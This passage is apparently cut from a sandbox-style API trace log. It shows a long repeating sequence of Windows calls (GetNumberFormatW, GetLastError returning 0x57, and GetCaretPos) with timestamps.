GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.382] GetLastError () returned 0x57 [0023.382] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.382] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.382] GetLastError () returned 0x57 [0023.382] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.382] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.382] GetLastError () returned 0x57 [0023.382] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.382] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.382] GetLastError () returned 0x57 [0023.382] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.382] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.382] GetLastError () returned 0x57 [0023.382] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.382] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.382] GetLastError () returned 0x57 [0023.382] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.382] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.382] GetLastError () returned 0x57 [0023.382] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.382] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.382] GetLastError () returned 0x57 [0023.382] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.382] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.382] GetLastError () returned 0x57 [0023.383] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.383] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.383] GetLastError () returned 0x57 [0023.383] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.383] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.383] GetLastError () returned 0x57 [0023.383] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.383] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.383] GetLastError () returned 0x57 [0023.383] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.383] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.383] GetLastError () returned 0x57 [0023.383] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.383] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.383] GetLastError () returned 0x57 [0023.383] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.383] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.383] GetLastError () returned 0x57 [0023.383] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.383] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.383] GetLastError () returned 0x57 [0023.383] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.383] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.383] GetLastError () returned 0x57 [0023.383] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.383] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.383] GetLastError () returned 0x57 [0023.383] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.383] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.383] GetLastError () returned 0x57 [0023.383] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.383] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.383] GetLastError () returned 0x57 [0023.383] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.383] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.383] GetLastError () returned 0x57 [0023.383] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.383] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.383] GetLastError () returned 0x57 [0023.383] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.383] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.383] GetLastError () returned 0x57 [0023.383] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.383] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.384] GetLastError () returned 0x57 [0023.384] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.384] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.384] GetLastError () returned 0x57 [0023.384] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.384] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.384] GetLastError () returned 0x57 [0023.384] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.384] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.384] GetLastError () returned 0x57 [0023.384] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.384] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.384] GetLastError () returned 0x57 [0023.384] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.384] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.384] GetLastError () returned 0x57 [0023.384] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.384] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.384] GetLastError () returned 0x57 [0023.384] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.384] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.384] GetLastError () returned 0x57 [0023.384] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.384] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.384] GetLastError () returned 0x57 [0023.384] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.384] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.384] GetLastError () returned 0x57 [0023.384] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.384] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.384] GetLastError () returned 0x57 [0023.384] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.385] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.385] GetLastError () returned 0x57 [0023.385] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.385] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.385] GetLastError () returned 0x57 [0023.385] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.385] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.385] GetLastError () returned 0x57 [0023.385] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.385] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.385] GetLastError () returned 0x57 [0023.385] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.385] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.385] GetLastError () returned 0x57 [0023.385] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.385] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.385] GetLastError () returned 0x57 [0023.385] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.385] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.385] GetLastError () returned 0x57 [0023.385] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.385] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.385] GetLastError () returned 0x57 [0023.385] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.385] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.385] GetLastError () returned 0x57 [0023.385] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.385] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.385] GetLastError () returned 0x57 [0023.385] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.385] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.385] GetLastError () returned 0x57 [0023.385] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.385] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.385] GetLastError () returned 0x57 [0023.385] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.385] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.385] GetLastError () returned 0x57 [0023.385] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.385] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.385] GetLastError () returned 0x57 [0023.385] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.386] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.386] GetLastError () returned 0x57 [0023.386] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.386] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.386] GetLastError () returned 0x57 [0023.386] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.386] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.386] GetLastError () returned 0x57 [0023.386] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.386] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.386] GetLastError () returned 0x57 [0023.386] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.386] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.386] GetLastError () returned 0x57 [0023.386] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.386] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.386] GetLastError () returned 0x57 [0023.386] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.386] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.386] GetLastError () returned 0x57 [0023.386] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.386] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.386] GetLastError () returned 0x57 [0023.386] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.386] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.386] GetLastError () returned 0x57 [0023.386] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.386] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.386] GetLastError () returned 0x57 [0023.386] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.386] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.386] GetLastError () returned 0x57 [0023.386] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.386] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.386] GetLastError () returned 0x57 [0023.386] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.386] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.386] GetLastError () returned 0x57 [0023.386] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.386] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.386] GetLastError () returned 0x57 [0023.386] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.386] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.387] GetLastError () returned 0x57 [0023.387] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.387] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.387] GetLastError () returned 0x57 [0023.387] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.387] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.387] GetLastError () returned 0x57 [0023.387] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.387] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.387] GetLastError () returned 0x57 [0023.387] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.387] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.387] GetLastError () returned 0x57 [0023.387] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.387] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.387] GetLastError () returned 0x57 [0023.387] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.387] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.387] GetLastError () returned 0x57 [0023.387] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.387] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.387] GetLastError () returned 0x57 [0023.387] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.387] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.387] GetLastError () returned 0x57 [0023.387] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.387] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.387] GetLastError () returned 0x57 [0023.387] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.387] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.387] GetLastError () returned 0x57 [0023.387] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.387] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.387] GetLastError () returned 0x57 [0023.387] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.387] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.387] GetLastError () returned 0x57 [0023.387] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.387] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.387] GetLastError () returned 0x57 [0023.387] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.387] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.387] GetLastError () returned 0x57 [0023.388] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.388] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.388] GetLastError () returned 0x57 [0023.388] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.388] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.388] GetLastError () returned 0x57 [0023.388] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.388] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.388] GetLastError () returned 0x57 [0023.388] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.388] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.388] GetLastError () returned 0x57 [0023.388] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.388] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.388] GetLastError () returned 0x57 [0023.388] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.388] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.388] GetLastError () returned 0x57 [0023.388] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.388] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.388] GetLastError () returned 0x57 [0023.388] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.388] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.388] GetLastError () returned 0x57 [0023.388] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.388] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.388] GetLastError () returned 0x57 [0023.388] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.388] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.388] GetLastError () returned 0x57 [0023.388] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.388] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.388] GetLastError () returned 0x57 [0023.388] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.388] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.388] GetLastError () returned 0x57 [0023.388] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.388] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.388] GetLastError () returned 0x57 [0023.388] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.388] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.388] GetLastError () returned 0x57 [0023.389] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.389] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: 